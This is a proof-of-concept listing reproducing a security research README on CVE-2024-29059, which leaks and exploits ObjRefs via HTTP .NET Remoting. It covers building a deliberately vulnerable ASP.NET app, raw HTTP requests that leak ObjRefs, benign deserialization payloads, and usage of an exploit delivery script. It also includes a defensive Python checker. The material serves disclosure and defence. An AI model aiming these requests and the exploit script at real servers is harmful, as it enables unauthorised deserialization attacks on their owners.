
POC details: 29581f8c3cfcdc909c177b4633233d3d491eb52c

Source
Related vulnerability
Title: Microsoft .NET Framework security vulnerability (CVE-2024-29059)
Description: Microsoft .NET Framework is a comprehensive and consistent programming model from Microsoft (USA) and a development platform for building applications for Windows, Windows Store, Windows Phone, Windows Server and Microsoft Azure. The platform includes the C# and Visual Basic programming languages, the common language runtime and an extensive class library. Microsoft .NET Framework contains a security vulnerability. An attacker can exploit it to obtain sensitive information.
Description
Additional resources for leaking and exploiting ObjRefs via HTTP .NET Remoting (CVE-2024-29059)
Introduction
# Leaking and Exploiting `ObjRef`s via HTTP .NET Remoting (CVE-2024-29059)

This repository provides further details and resources on the [CODE WHITE blog post of the same name *Leaking ObjRefs to Exploit HTTP .NET Remoting*](https://code-white.com/blog/leaking-objrefs-to-exploit-http-dotnet-remoting/):

1. Creating a vulnerable ASP.NET web application
2. Detecting `ObjRef` leaks
3. Example deserialization payloads that work under the `TypeFilterLevel.Low` restrictions
4. Exploit script for delivering the payloads


## 1. Creating a Vulnerable ASP.NET Web Application

The following is based on [*Configure Application Insights for your ASP.NET website* by Microsoft](https://learn.microsoft.com/en-us/azure/azure-monitor/app/asp-net) and describes how to create a vulnerable ASP.NET web application with Visual Studio 2019 (required to target .NET Framework 4.5.2; it can still be downloaded at <https://aka.ms/vs/16/release/vs_community.exe>) and Microsoft Application Insights:

1. Open Visual Studio 2019.
2. Select **File** > **New** > **Project**.
3. Select **ASP.NET Web Application (.NET Framework) C#**, then **Next**.
4. Select **.NET Framework 4.5.2**, then **Create**.
5. Select **Empty**, then **Create**.
6. Select **Project** > **Add Application Insights Telemetry**.
7. Select **Application Insights SDK (local)**, then **Next**.
8. Check **NuGet packages**, then click **Finish**.

If the .NET Framework updates of January 2024 are installed, open the `Web.config` file and add the following under [`/configuration/appSettings`](https://learn.microsoft.com/en-us/dotnet/framework/configure-apps/file-schema/appsettings/appsettings-element-for-configuration) to re-enable the vulnerable behavior:

```xml
<add key="microsoft:Remoting:LateHttpHeaderParsing" value="true" />
```

You can then run the web application via **Debug** > **Start Without Debugging** or by pressing Ctrl+F5.


## 2. Detecting `ObjRef` Leaks

You can use the following requests to leak `ObjRef`s of `MarshalByRefObject` instances stored in the `LogicalCallContext`:

- `BinaryServerFormatterSink`:

    ```
    GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0
    __RequestVerb: POST
    Content-Type: application/octet-stream
    ```

- `SoapServerFormatterSink`:

    ```
    GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0
    __RequestVerb: POST
    Content-Type: text/xml
    ```

Leaked `ObjRef` URIs can then be matched using the following regex:

```
/[0-9a-f_]+/[0-9A-Za-z_+]+_\d+\.rem
```
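As an added example (not code from the repository or the CODE WHITE post), the following Python helpers cover the two checks a defender would take from sections 1 and 2: auditing `Web.config` for the `microsoft:Remoting:LateHttpHeaderParsing` opt-in, and scanning a captured response to the probe requests above with the README's regex. The `Web.config` snippet and the HTTP response are constructed samples.

```python
import re
import xml.etree.ElementTree as ET
from typing import List

# ObjRef URI pattern from the README (section 2).
OBJREF_URI_RE = re.compile(r"/[0-9a-f_]+/[0-9A-Za-z_+]+_\d+\.rem")
# appSettings key from the README (section 1) that re-enables the vulnerable behavior.
LATE_HEADER_KEY = "microsoft:Remoting:LateHttpHeaderParsing"


def late_header_parsing_enabled(web_config_xml: str) -> bool:
    """True if Web.config opts back into late HTTP header parsing."""
    # After the January 2024 .NET Framework updates this opt-in is what makes
    # the application vulnerable again, so audit it first.
    root = ET.fromstring(web_config_xml.strip())
    for add in root.iterfind("./appSettings/add"):
        if add.get("key") == LATE_HEADER_KEY:
            return add.get("value", "").strip().lower() == "true"
    return False


def find_leaked_objref_uris(response_body: str) -> List[str]:
    """Distinct ObjRef URIs in a captured HTTP response, in order of appearance."""
    # A non-empty result for the probe responses means ObjRefs from the
    # LogicalCallContext are reaching unauthenticated clients.
    found: List[str] = []
    for match in OBJREF_URI_RE.finditer(response_body):
        if match.group(0) not in found:
            found.append(match.group(0))
    return found


# Constructed samples (not captured from a real host).
SAMPLE_WEB_CONFIG = """
<configuration>
  <appSettings>
    <add key="microsoft:Remoting:LateHttpHeaderParsing" value="true" />
  </appSettings>
</configuration>
"""
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/xml\r\n\r\n"
    '<a1:ObjRef id="ref-1" uri="/96e8b5e2_a6f2_4d5c_8b7a_1c2d3e4f5a6b/GkT3x_9sQ+vM_2.rem"/>'
    '<a1:ObjRef id="ref-2" uri="/96e8b5e2_a6f2_4d5c_8b7a_1c2d3e4f5a6b/GkT3x_9sQ+vM_2.rem"/>'
)

if __name__ == "__main__":
    print("LateHttpHeaderParsing enabled:", late_header_parsing_enabled(SAMPLE_WEB_CONFIG))
    print("leaked ObjRef URIs:", find_leaked_objref_uris(SAMPLE_RESPONSE))
```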


## 3. Example Deserialization Payloads

We have created two simple deserialization payloads based on the [*TextFormattingRunProperties* gadget of YSoSerial.Net](https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Generators/TextFormattingRunPropertiesGenerator.cs) with custom XAML payloads that work under the restrictions caused by `TypeFilterLevel.Low` to perform the following:

- `HttpContext.Current.Response.AddHeader("Set-Cookie", "x=ad92afb4-00c3-4479-bab8-2425b5716081")`
- `HttpContext.Current.Response.RedirectLocation = "/ad92afb4-00c3-4479-bab8-2425b5716081"`

The HTTP headers can be observed in the server's response to the HTTP .NET Remoting request.


## 4. Exploit Script

The `RemoteApplicationMetadata.py` script provides a way to leak an existing `ObjRef` and then use it in a subsequent request to deliver a given payload:

```
usage: RemoteApplicationMetadata.py [-h] [-c] [--chunk-range CHUNK_RANGE] [-e] [-f {binary,soap}] [-u] [-v] url [file]

positional arguments:
  url                   target URL (without `RemoteApplicationMetadata.rem`)
  file                  BinaryFormatter/SoapFormatter payload file (default: stdin)

options:
  -h, --help            show this help message and exit
  -c, --chunked         use chunked Transfer-Encoding for request
  --chunk-range CHUNK_RANGE
                        range to pick the chunk size from randomly, e. g., 1-10
  -e, --encoding        apply a random non ASCII-based encoding on SOAP
  -f {binary,soap}, --format {binary,soap}
                        targeted runtime serializer format (default: soap)
  -u, --use-generic-uri
                        use the generic `RemoteApplicationMetadata.rem` also for the payload delivery request
  -v, --verbose         print verbose info
```

Example:

```
./RemoteApplicationMetadata.py -f binary https://127.0.0.1:44365 AddHeader.bin -u -v
```
File snapshot

```
[4.0K] /data/pocs/29581f8c3cfcdc909c177b4633233d3d491eb52c
├── [ 749] DISCLAIMER.md
├── [1.0K] LICENSE
├── [4.0K] Payloads
│   ├── [1.0K] AddHeader.binary
│   ├── [1.7K] AddHeader.soap
│   ├── [1.0K] RedirectLocation.binary
│   └── [1.6K] RedirectLocation.soap
├── [4.3K] README.md
├── [4.0K] RemoteApplicationMetadata.py
└── [4.0K] WebApplication452
    ├── [8.7K] ApplicationInsights.config
    ├── [4.0K] bin
    │   └── [8.7K] ApplicationInsights.config
    ├── [4.0K] obj
    │   └── [4.0K] Debug
    │       ├── [ 17K] DesignTimeResolveAssemblyReferencesInput.cache
    │       └── [   0] WebApplication452.csproj.FileListAbsolute.txt
    ├── [1.3K] packages.config
    ├── [4.0K] Properties
    │   ├── [1.3K] AssemblyInfo.cs
    │   ├── [  83] serviceDependencies.json
    │   ├── [  87] serviceDependencies.local.json
    │   └── [ 151] serviceDependencies.local.json.user
    ├── [ 13K] WebApplication452.csproj
    ├── [1.4K] WebApplication452.csproj.user
    ├── [2.6K] Web.config
    ├── [1.2K] Web.Debug.config
    └── [1.3K] Web.Release.config

6 directories, 22 files
```